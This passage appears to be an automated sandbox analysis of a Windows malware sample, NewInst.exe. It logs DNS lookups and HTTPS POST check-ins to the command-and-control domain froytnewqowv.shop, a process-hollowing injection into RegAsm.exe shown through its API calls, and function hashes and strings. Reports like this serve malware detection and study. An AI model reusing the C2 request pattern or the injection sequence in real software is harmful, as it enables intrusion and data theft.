Aug 29, 2024 22:58:59.290585995 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.290626049 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.290827036 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.391083956 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.391211033 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.391264915 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.391275883 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.395483971 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.395541906 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.395549059 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.395673990 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.395720959 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.396652937 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.396666050 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.396680117 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.396686077 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.485639095 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.485677958 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.485754013 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.486917973 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.486932039 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.994982004 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.995093107 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.996347904 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.996356010 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.996659994 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.997826099 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.997869968 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.997890949 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:59:00.462831020 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:59:00.463051081 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:59:00.463121891 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:59:00.463320971 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:59:00.463320971 CEST	49731	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:59:00.463335991 CEST	443	49731	188.114.97.3	192.168.2.4
Aug 29, 2024 22:59:00.463361979 CEST	443	49731	188.114.97.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 22:58:58.728282928 CEST	49543	53	192.168.2.4	1.1.1.1
Aug 29, 2024 22:58:58.740365028 CEST	53	49543	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 22:58:58.728282928 CEST	192.168.2.4	1.1.1.1	0x903	Standard query (0)	froytnewqowv.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 22:58:58.740365028 CEST	1.1.1.1	192.168.2.4	0x903	No error (0)	froytnewqowv.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 22:58:58.740365028 CEST	1.1.1.1	192.168.2.4	0x903	No error (0)	froytnewqowv.shop		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

froytnewqowv.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	7640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 20:58:59 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: froytnewqowv.shop
2024-08-29 20:58:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-29 20:58:59 UTC	555	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 20:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HybXD%2FvrelZriL2eg4H4HDQKTbWYoI%2FV%2Fdn9u0RwiBe7b4dE4MuZYu4BfIzBxM36iCna8fiUmNRrA90WtSR5M8amjca3scurrvb1ksSinoyGWBUPyzXPCckSoz%2FHHIiwY9t6Wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8baf7658e9530f7d-EWR
2024-08-29 20:58:59 UTC	814	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-29 20:58:59 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
2024-08-29 20:58:59 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 66 68 48 7a 41 54 6d 31 5f 58 33 35 63 4f 2e 51 59 34 51 30 5a 44 5a 79 46 54 4f 37 32 42 2e 69 6d 73 69 67 32 69 79 5a 74 49 2d 31 37 32 34 39 36 35 31 33 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e Data Ascii: <input type="hidden" name="atok" value="SfhHzATm1_X35cO.QY4Q0ZDZyFTO72B.imsig2iyZtI-1724965139-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn
2024-08-29 20:58:59 UTC	853	IN	Data Raw: 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 Data Ascii: or sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflar
2024-08-29 20:58:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.97.3	443	7640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 20:58:59 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=SfhHzATm1_X35cO.QY4Q0ZDZyFTO72B.imsig2iyZtI-1724965139-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: froytnewqowv.shop
2024-08-29 20:58:59 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 41 73 4e 4e 32 2d 2d 70 70 31 33 33 37 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=1AsNN2--pp1337&j=
2024-08-29 20:59:00 UTC	808	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 20:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=145ovnuei1tg9oasiju9jdg1v4; expires=Mon, 23-Dec-2024 14:45:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISSbKlUozkVYsUjM5gJQbsmYEr0BzFPl1W3Srnd8he0e2G%2FqiaFk8XqVvH%2FworFgZw%2FoXR2ygOCcfFsBJO6F1ha%2B1a39BZ7BAGNH3VgMTqhKci%2FE6nmMMpRJjE23s2b47BtLJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8baf765d8dda7c84-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 20:59:00 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-29 20:59:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:58:58
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\NewInst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NewInst.exe"
Imagebase:	0x70000
File size:	283'648 bytes
MD5 hash:	C2E7E93D02FA7CBA953E3DD4463BA91B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:58:58
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:58:58
Start date:	29/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:59:00
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764
Imagebase:	0xc90000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	27.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	52.4%
Total number of Nodes:	21
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 023A2499 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,023A240B,023A23FB), ref: 023A2608
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023A261B
Wow64GetThreadContext.KERNEL32(000002E8,00000000), ref: 023A2639
ReadProcessMemory.KERNELBASE(000002EC,?,023A244F,00000004,00000000), ref: 023A265D
VirtualAllocEx.KERNELBASE(000002EC,?,?,00003000,00000040), ref: 023A2688
WriteProcessMemory.KERNELBASE(000002EC,00000000,?,?,00000000,?), ref: 023A26E0
WriteProcessMemory.KERNELBASE(000002EC,00400000,?,?,00000000,?,00000028), ref: 023A272B
WriteProcessMemory.KERNELBASE(000002EC,-00000008,?,00000004,00000000), ref: 023A2769
Wow64SetThreadContext.KERNEL32(000002E8,02260000), ref: 023A27A5
ResumeThread.KERNELBASE(000002E8), ref: 023A27B4

Strings

aryA, xrefs: 023A24DF
GetThreadContext, xrefs: 023A2573
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 023A2607
TerminateProcess, xrefs: 023A2697
Load, xrefs: 023A24D7
VirtualAlloc, xrefs: 023A2560
WriteProcessMemory, xrefs: 023A25AC
ReadProcessMemory, xrefs: 023A2586
ress, xrefs: 023A2523
VirtualAllocEx, xrefs: 023A2599
CreateProcessA, xrefs: 023A254D
ResumeThread, xrefs: 023A25D5
GetP, xrefs: 023A251B
SetThreadContext, xrefs: 023A25BF

Memory Dump Source

Source File: 00000000.00000002.1667736926.00000000023A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23a2000_NewInst.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 80ee3500a03fe35677b2a0b2f9951ca28869e21a27a954b81ff6d0d2b28ec9a1
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 95B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA51CB94

Function 021B0B20 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 391
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(033A3594,?,?,?), ref: 021B10C1

Strings

#l>@, xrefs: 021B0E4E
&S!, xrefs: 021B0BA8

Memory Dump Source

Source File: 00000000.00000002.1667623444.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21b0000_NewInst.jbxd

Similarity

API ID: ProtectVirtual
String ID: #l>@$&S!
API String ID: 544645111-1705501573
Opcode ID: 659adfc955ce8ff34f19eb60afe968aa69c147ec4b359d0e3cdca5d024749e69
Instruction ID: ae758c8d4f72bf33b7e3d59eb25841be15174da352c37cbbf3d6433051866c9b
Opcode Fuzzy Hash: 659adfc955ce8ff34f19eb60afe968aa69c147ec4b359d0e3cdca5d024749e69
Instruction Fuzzy Hash: FFF18EB0E412688FDB21CFA9C990BDEBBB2BF48304F158599E459AB351C7309D85CF94

Function 021B0508 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(033A3594,?,?,?), ref: 021B10C1

Memory Dump Source

Source File: 00000000.00000002.1667623444.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21b0000_NewInst.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b57739ed2a7e0f752e4ef759436914cc18f904179759d8c2e28700b613abafe8
Instruction ID: 101ab8dd8de18b86ae5effee5d6a4a02fd91ef9b30ee74a1256db06abc0be426
Opcode Fuzzy Hash: b57739ed2a7e0f752e4ef759436914cc18f904179759d8c2e28700b613abafe8
Instruction Fuzzy Hash: 3C21EFB5904259ABCB10DF9AD984ADEFBB4FF08314F10812AE918B7210C3B4A954CFA5

Analysis Process: RegAsm.exePID: 7640, Parent PID: 7576COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.2%
Total number of Nodes:	124
Total number of Limit Nodes:	18

Executed Functions

Function 0042E6A2 Relevance: 28.7, APIs: 9, Strings: 7, Instructions: 690
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(M'U!), ref: 0042E709
SysAllocString.OLEAUT32(338F3183), ref: 0042E7C9

Strings

T#"], xrefs: 0042E6AA
2B, xrefs: 0042EC1F
B, xrefs: 0042E96B
M'U!, xrefs: 0042E6D6
`a, xrefs: 0042E8B9
4`[b, xrefs: 0042EEF0
D%|', xrefs: 0042E729

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: 2B$4`[b$D%|'$M'U!$T#"]$`a$B
API String ID: 2525500382-440078741
Opcode ID: 01042571e4295641df4ca99b9b0eb7a99067cba1e493cd7028eceaa882cd31b4
Instruction ID: 4ea0f8461768fe1b52b4bb7f56d1ac6bcebf894173c0e48dd6f9671abf23832b
Opcode Fuzzy Hash: 01042571e4295641df4ca99b9b0eb7a99067cba1e493cd7028eceaa882cd31b4
Instruction Fuzzy Hash: 8432DB71608341DFD318DF26E890B2BB7E2FF89304F54892EE58687391C7399845CB9A

Function 00433065 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 004330E4

Strings

d9, xrefs: 00433077
|v, xrefs: 00433085
e~, xrefs: 00433070
60, xrefs: 0043307E

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: 60$d9$e~$|v
API String ID: 1029625771-4027691356
Opcode ID: 10d1f74b673baf5985357ac771ea983f42f2d8c5f04e1f47e768d300753d8b97
Instruction ID: a935d69bc0b41f50d49fbc911f171b254fced2c73b8748081bc11f002b6ad5dc
Opcode Fuzzy Hash: 10d1f74b673baf5985357ac771ea983f42f2d8c5f04e1f47e768d300753d8b97
Instruction Fuzzy Hash: 23118BB4A04656EFDB04CF68E8517AEBBB1BF4A301F205A2AE41177780C378A551CF99

Function 0042E490 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00438A50,00000000,00000001,00438A40,00000000), ref: 0042E5B0

Strings

}6{, xrefs: 0042E4BF
us, xrefs: 0042E4AF
ano, xrefs: 0042E4D7

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID: ano$us$}6{
API String ID: 542301482-351957135
Opcode ID: af9b8c942e7e42f9d6f1a60f4fba51a431f067fa1e444dfa2c3067655a943ee9
Instruction ID: e57b08429114ab8adb8d7706089b0171d4839cc11fc5b81c39fe6ae305b1ab2d
Opcode Fuzzy Hash: af9b8c942e7e42f9d6f1a60f4fba51a431f067fa1e444dfa2c3067655a943ee9
Instruction Fuzzy Hash: C23156B0118301EFE320CF16D855B5BBBE4ABC6718F508A0DF5A81A291D7759909CFAA

Function 0042F000 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3ba5f766fa66d119fab7447f670ac816e17a21b25af293fb5ac5c01c78e35f1
Instruction ID: 3240e43821d0b61d1503e16c6e48e9e4f25e53118969b799ed9cb0a1830fb43f
Opcode Fuzzy Hash: c3ba5f766fa66d119fab7447f670ac816e17a21b25af293fb5ac5c01c78e35f1
Instruction Fuzzy Hash: 093106327083244FD3155D39989023BBAA29BC5330FD9833EEE728B3C6D9794C49424A

Function 0040AD00 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 551
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(097D0B85,00000000,00000800), ref: 0040ADA2

Strings

ca, xrefs: 0040B003
sq, xrefs: 0040AFE3
+), xrefs: 0040B073
froytnewqowv.shop, xrefs: 0040B20F, 0040B416
03DB2D93F5C889480B6C4A7BCA26E53A, xrefs: 0040B24A
wu, xrefs: 0040AFDB

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: 03DB2D93F5C889480B6C4A7BCA26E53A$froytnewqowv.shop$+)$ca$sq$wu
API String ID: 1029625771-91587983
Opcode ID: 5208369c4dcec06519413012fe37efb1aa3758c617be9cb6b3c668bc697f39a3
Instruction ID: 06de89f56e014253771ed6bd20009a01ee4e50481b0b26ca403677980d132e40
Opcode Fuzzy Hash: 5208369c4dcec06519413012fe37efb1aa3758c617be9cb6b3c668bc697f39a3
Instruction Fuzzy Hash: 7902BDB05083408BD3109F15D89176FBBE1EF96708F14893EE8C56B392D37A9909CB9A

Function 00409E20 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00409E39
ExitProcess.KERNEL32 ref: 00409E88

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExit
String ID:
API String ID: 2333725396-0
Opcode ID: 8beac1b10a10fcb60d2c15c538357b023e3f4390b0938a41504a4b1295f7eb37
Instruction ID: e92a3a15cde9d33f0b01b50ebb84327ff7d382b2a0a0b898d37cd4e2278949f1
Opcode Fuzzy Hash: 8beac1b10a10fcb60d2c15c538357b023e3f4390b0938a41504a4b1295f7eb37
Instruction Fuzzy Hash: 5EF08271808210A6CA507B76DA0671EBB585F1134AF00053FFC86B12D3EBBC4D0596DF

Function 0042E5C2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(73A571A2), ref: 0042E649

Strings

LM, xrefs: 0042E5EA

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: LM
API String ID: 2525500382-360198107
Opcode ID: 38003b24516042bbc94b6e810c6582e5f8c574b8805a4b935a1b46ab55797f0b
Instruction ID: 9c56c2a970dff23b316f10345c2b859af51562a1c236da72b5c263d0f6902ca3
Opcode Fuzzy Hash: 38003b24516042bbc94b6e810c6582e5f8c574b8805a4b935a1b46ab55797f0b
Instruction Fuzzy Hash: 1B11E0B01183809FE390DF2AD480A2ABBF5BF99704F905E1DF5D58B251CB3698158F2A

Function 00431BC0 Relevance: 1.5, APIs: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 00431C3D

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 96cb44eb8e78e60550010c4dfd45fbd262d49c272638a59c278a687f9f1d43aa
Instruction ID: fd74f894e10263e34cfde22a41f343e177c2c0a33c2df5347239aa2e5e324ff9
